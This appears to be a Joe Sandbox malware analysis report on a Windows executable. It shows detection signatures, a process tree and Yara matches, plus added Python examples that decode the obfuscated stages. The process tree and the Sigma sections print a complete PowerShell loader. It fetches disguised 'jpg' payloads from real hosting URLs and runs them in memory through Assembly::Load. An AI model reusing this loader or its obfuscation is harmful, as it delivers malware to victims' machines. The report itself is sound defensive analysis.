Windows Analysis Report
GdGXG0bnxH.exe

Overview

General Information

Sample name: GdGXG0bnxH.exe (renamed because the original name is a hash value)
Original sample name: 8970eef61ba5b0d180b01242796bad53.exe
Analysis ID: 1576152
MD5: 8970eef61ba5b0d180b01242796bad53
SHA1: b321407f1f5ce589c99060e413e8edd676f4301c
SHA256: 14fc6009715e1f4627e3fd9cefb81c27d55f766a210c651b6a0491b075f46189
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
.NET source code references suspicious native API functions
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Binary contains a suspicious time stamp
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • GdGXG0bnxH.exe (PID: 2404 cmdline: "C:\Users\user\Desktop\GdGXG0bnxH.exe" MD5: 8970EEF61BA5B0D180B01242796BAD53)
    • cmd.exe (PID: 7248 cmdline: cmd.exe /c 675c87f6bfee1.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 7360 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • powershell.exe (PID: 7412 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sodigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$B
p$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$g$D0$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GI$YQBz$GU$Ng$0$EM$bwBt$G0$YQBu$GQ$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$FM$dQBi$HM$d$By$Gk$bgBn$Cg$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Cw$I$$k$GI$YQBz$GU$Ng$0$Ew$ZQBu$Gc$d$Bo$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$I$$9$Fs$QwBv$G4$dgBl$HI$d$Bd$Do$OgBU$G8$QgBh$HM$ZQ$2$DQ$UwB0$HI$aQBu$Gc$K$$k$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bj$G8$bQBt$GE$bgBk$EI$eQB0$GU$cw$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$QwBv$G4$dgBl$HI$d$Bd$Do$OgBG$HI$bwBt$EI$YQBz$GU$Ng$0$FM$d$By$Gk$bgBn$Cg$J$Bi$GE$cwBl$DY$N$BD$G8$bQBt$GE$bgBk$Ck$Ow$g$C$$I$$k$HQ$ZQB4$HQ$I$$9$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$Ow$g$CQ$b$Bv$GE$Z$Bl$GQ$QQBz$HM$ZQBt$GI$b$B5$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBS$GU$ZgBs$GU$YwB0$Gk$bwBu$C4$QQBz$HM$ZQBt$GI$b$B5$F0$Og$6$Ew$bwBh$GQ$K$$k$GM$bwBt$G0$YQBu$GQ$QgB5$HQ$ZQBz$Ck$Ow$g$C$$J$BF$G4$YwB
v$GQ$ZQBk$FQ$ZQB4$HQ$I$$9$Fs$QwBv$G4$dgBl$HI$d$Bd$Do$OgBU$G8$QgBh$HM$ZQ$2$DQ$UwB0$HI$aQBu$Gc$K$$k$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YwBv$G0$c$By$GU$cwBz$GU$Z$BC$Hk$d$Bl$EE$cgBy$GE$eQ$g$D0$I$BH$GU$d$$t$EM$bwBt$H$$cgBl$HM$cwBl$GQ$QgB5$HQ$ZQBB$HI$cgBh$Hk$I$$t$GI$eQB0$GU$QQBy$HI$YQB5$C$$J$Bl$G4$YwBU$GU$e$B0$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$HQ$eQBw$GU$I$$9$C$$J$Bs$G8$YQBk$GU$Z$BB$HM$cwBl$G0$YgBs$Hk$LgBH$GU$d$BU$Hk$c$Bl$Cg$JwB0$GU$cwB0$H$$bwB3$GU$cgBz$Gg$ZQBs$Gw$LgBI$G8$YQBh$GE$YQBh$GE$cwBk$G0$ZQ$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$EU$bgBj$G8$Z$Bl$GQ$V$Bl$Hg$d$$g$D0$WwBD$G8$bgB2$GU$cgB0$F0$Og$6$FQ$bwBC$GE$cwBl$DY$N$BT$HQ$cgBp$G4$Zw$o$CQ$QgB5$HQ$ZQBz$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$G0$ZQB0$Gg$bwBk$C$$PQ$g$CQ$d$B5$H$$ZQ$u$Ec$ZQB0$E0$ZQB0$Gg$bwBk$Cg$JwBs$GY$cwBn$GU$Z$Bk$GQ$Z$Bk$GQ$Z$Bh$Cc$KQ$u$Ek$bgB2$G8$awBl$Cg$J$Bu$HU$b$Bs$Cw$I$Bb$G8$YgBq$GU$YwB0$Fs$XQBd$C$$K$$n$C$$d$B4$HQ$LgBJ$Gs$SQBo$GM$ZwBh$C8$cwBk$GE$bwBs$G4$dwBv$GQ$LwBz$GY$dwBx$GU$cQB3$C8$d$B3$HE$ZQB3$HE$ZQ$v$Gc$cgBv$C4$d$Bl$Gs$YwB1$GI$d$Bp$GI$Jw$s$C$$Jw$w$Cc$L$$g$Cc$UwB0$GE$cgB0$HU$c$BO$GE$bQBl$Cc$L$$g$Cc$TQBz$GI$dQBp$Gw$Z$$n$Cw$I$$n$D$$Jw$p$Ck$fQB9$$==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $sodigo.replace('$','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.IkIhcga/sdaolnwod/sfwqeqw/twqewqe/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
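The first PowerShell stage (PID 7412) hides the second-stage script in a base64 string in which every "A" has been swapped for "$"; the launcher undoes the swap with `.replace('$','A')`, base64-decodes, reads the bytes as `Unicode` (UTF-16LE, the same encoding `-EncodedCommand` would use) and passes the resulting text to a child `powershell.exe` positionally, with the stray `.exe -windowstyle hidden -exec` tokens trailing it (the child, PID 7548, carries the same tail). The substitution is enough to defeat naive base64 matching on the command line, which is why the Sigma hits key on `FromBase64String` rather than on a recognisable encoded command. The following decoder is an added example written for this report, not part of Joe Sandbox or of the sample; it parses the launcher pattern generically (variable literal, `.replace()` pair, `GetString` encoding) instead of hard-coding `$sodigo`. The constructed sample command line reuses only the opening of the real `$sodigo` blob joined to its closing `fQB9$$==`, so it decodes to the first statement plus the final braces; the function names and regexes are this example's own.

```python
import base64
import re

# Constructed sample command line: the opening of the $sodigo blob exactly as it
# appears in the process tree for PID 7412, joined directly to the blob's closing
# "fQB9$$==". The middle of the real blob is omitted, so this stand-in decodes to
# the first statement of the stage-2 script plus its final "}}".
SAMPLE_CMDLINE = (
    "$sodigo = '"
    "WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$"
    "fQB9$$=="
    "';$oWjuxd = [system.Text.encoding]::Unicode.GetString("
    "[system.convert]::Frombase64string( $sodigo.replace('$','A') ));"
    "powershell.exe $OWjuxD .exe -windowstyle hidden -exec"
)

# $name = '...'  (single-quoted PowerShell literal; the blob itself contains no quotes)
VAR_ASSIGN = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")
# $name.replace('X','Y')  -- the one-character substitution that restores valid base64
REPLACE_CALL = re.compile(r"\$(\w+)\.replace\('(.)','(.)'\)", re.IGNORECASE)
# [Text.Encoding]::Unicode/UTF8/ASCII.GetString(...) names the byte encoding used
ENCODING_CALL = re.compile(r"::(Unicode|UTF8|ASCII)\.GetString", re.IGNORECASE)
DOTNET_TO_PY = {"unicode": "utf-16-le", "utf8": "utf-8", "ascii": "ascii"}


def decode_stage1(cmdline: str) -> str:
    """Recover the script hidden behind a '$var.replace(c,A) -> FromBase64String' launcher."""
    # PowerShell variable names are case-insensitive, so key the literals by lower case
    literals = {name.lower(): val for name, val in VAR_ASSIGN.findall(cmdline)}
    m = REPLACE_CALL.search(cmdline)
    if m is None:
        raise ValueError("no .replace() substitution found in command line")
    var, old, new = m.groups()
    if var.lower() not in literals:
        raise ValueError(f"substituted variable ${var} has no string literal")
    b64 = literals[var.lower()].replace(old, new)
    b64 += "=" * (-len(b64) % 4)              # tolerate blobs whose padding was stripped
    raw = base64.b64decode(b64)
    enc = ENCODING_CALL.search(cmdline)
    codec = DOTNET_TO_PY[enc.group(1).lower()] if enc else "utf-16-le"
    return raw.decode(codec)


if __name__ == "__main__":
    print(decode_stage1(SAMPLE_CMDLINE))
```

Run against the full command line from the process tree, the same function yields the stage-2 script shown for PID 7548; the report renders that script's CR/LF line breaks as spaces, which is why statements such as `$compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = ...` appear to run together.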
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 7412 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: powershell.exe PID: 7412 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | (matched strings below)
    • 0xbd62f:$b2: ::FromBase64String(
    • 0x1202d8:$b2: ::FromBase64String(
    • 0xbd402:$b3: ::UTF8.GetString(
    • 0x1200ab:$b3: ::UTF8.GetString(
    • 0xf4c8:$s1: -join
    • 0x5e916:$s1: -join
    • 0x70b3e:$s3: reverse
    • 0x77793:$s3: reverse
    • 0x7977a:$s3: reverse
    • 0x847a9:$s3: reverse
    • 0x8f6ee:$s3: reverse
    • 0x8f9dc:$s3: reverse
    • 0x900f6:$s3: reverse
    • 0x908af:$s3: reverse
    • 0x9799a:$s3: reverse
    • 0x97db4:$s3: reverse
    • 0x9893c:$s3: reverse
    • 0x995e9:$s3: reverse
    • 0xd48df:$s3: reverse
    • 0xddf41:$s3: reverse
    • 0x169b7e:$s3: reverse
Process Memory Space: powershell.exe PID: 7548 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: powershell.exe PID: 7548 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | (matched strings below)
      • 0xee61:$b2: ::FromBase64String(
      • 0x860d4:$b2: ::FromBase64String(
      • 0x86edd:$b2: ::FromBase64String(
      • 0xaf321:$b2: ::FromBase64String(
      • 0xb018b:$b2: ::FromBase64String(
      • 0xcad96:$b2: ::FromBase64String(
      • 0xe1627:$b2: ::FromBase64String(
      • 0xeb8bd:$b2: ::FromBase64String(
      • 0xec34:$b3: ::UTF8.GetString(
      • 0x85ea7:$b3: ::UTF8.GetString(
      • 0x86cb0:$b3: ::UTF8.GetString(
      • 0xaf0f4:$b3: ::UTF8.GetString(
      • 0xaff5e:$b3: ::UTF8.GetString(
      • 0xcab69:$b3: ::UTF8.GetString(
      • 0xe13fa:$b3: ::UTF8.GetString(
      • 0xeb690:$b3: ::UTF8.GetString(
      • 0x4a4fb:$s1: -join
      • 0x55f33:$s1: -join
      • 0xa8f37:$s1: -join
      • 0x7c87:$s3: Reverse
      • 0x8b65:$s3: Reverse
Source | Rule | Description | Author | Strings
amsi64_7548.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

Spreading
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.IkIhcga/sdaolnwod/sfwqeqw/twqewqe/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param 
([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startInde
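The stage-2 script above fetches a "jpg" from one of two hard-coded public-hosting URLs (shuffled, first success wins), treats the bytes as UTF-8 text, carves whatever sits between `<<BASE64_START>>` and `<<BASE64_END>>`, base64-decodes it and hands the bytes to `[System.Reflection.Assembly]::Load`, so the .NET payload never touches disk. It then resolves `testpowershell.Hoaaaaaasdme` and invokes `lfsgeddddddda` with five string arguments, the first of which is a string written backwards (the reason the "Potential PowerShell Obfuscation Via Reversed Commands" Sigma rule fires). The remaining lines that reference `$Bytes`, `$encText` and `Get-CompressedByteArray` use variables and a function the script never defines and look like filler. What the loaded assembly does with `StartupName` and `Msbuild` is not shown in the report. The following is an added example, not part of Joe Sandbox or of the sample: it reproduces the marker carve over a constructed stand-in "image" (a JPEG-looking prefix around a base64 body that starts with an MZ header; not a real assembly), checks the carved bytes for a PE header, and mirrors the invoke arguments back into readable form. The constructed bytes, the `REVERSED_PATH` heuristic and the function names are this example's own.

```python
import base64
import re
from typing import List, Optional

START_FLAG = "<<BASE64_START>>"
END_FLAG = "<<BASE64_END>>"

# Constructed stand-in for the downloaded "image": JPEG SOI/APP0 bytes, the two
# markers the script searches for, and a base64 body beginning with "MZ". The
# body is filler so the carve can be exercised; it is not a real .NET assembly.
FAKE_PAYLOAD = b"MZ\x90\x00" + b"constructed filler, not a real .NET assembly"
FAKE_IMAGE = (
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01"
    + b"\xfe\x80 junk " + START_FLAG.encode()
    + base64.b64encode(FAKE_PAYLOAD)
    + END_FLAG.encode() + b"\xff\xd9"
)

# Invoke() arguments exactly as they appear in the PID 7548 command line.
INVOKE_ARGS = [" txt.IkIhcga/sdaolnwod/sfwqeqw/twqewqe/gro.tekcubtib",
               "0", "StartupName", "Msbuild", "0"]

# Heuristic (this example's own): a mirrored argument that starts like host.tld/ was reversed.
REVERSED_PATH = re.compile(r"^[\w.-]+\.[a-z]{2,}/", re.IGNORECASE)


def carve_stage2(image_bytes: bytes) -> Optional[bytes]:
    """Reproduce the loader's marker search and base64 decode over the fetched bytes."""
    text = image_bytes.decode("utf-8", errors="replace")   # mirrors Encoding.UTF8.GetString
    start = text.find(START_FLAG)
    end = text.find(END_FLAG)
    if start < 0 or end <= start:                           # same guard as the script
        return None
    start += len(START_FLAG)
    return base64.b64decode(text[start:end])


def looks_like_pe(blob: bytes) -> bool:
    """Cheap sanity check before treating carved bytes as an assembly."""
    return blob[:2] == b"MZ"


def deobfuscate_args(args: List[str]) -> List[str]:
    """Undo the string reversal on any argument whose mirror image reads as host/path."""
    out = []
    for a in args:
        mirrored = a[::-1]
        out.append(mirrored if REVERSED_PATH.match(mirrored.strip()) else a)
    return out


if __name__ == "__main__":
    payload = carve_stage2(FAKE_IMAGE)
    print("carved", len(payload or b""), "bytes, PE header:", looks_like_pe(payload or b""))
    print(deobfuscate_args(INVOKE_ARGS))
```

Applied to the real arguments, the first string mirrors to a bitbucket.org download path ending in `.txt` (with the author's stray space preserved), i.e. a second hosting location of the same kind as the two "jpg" URLs; the `0`, `StartupName`, `Msbuild`, `0` arguments are left untouched because they do not mirror into anything path-like.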

System Summary
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sodigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$D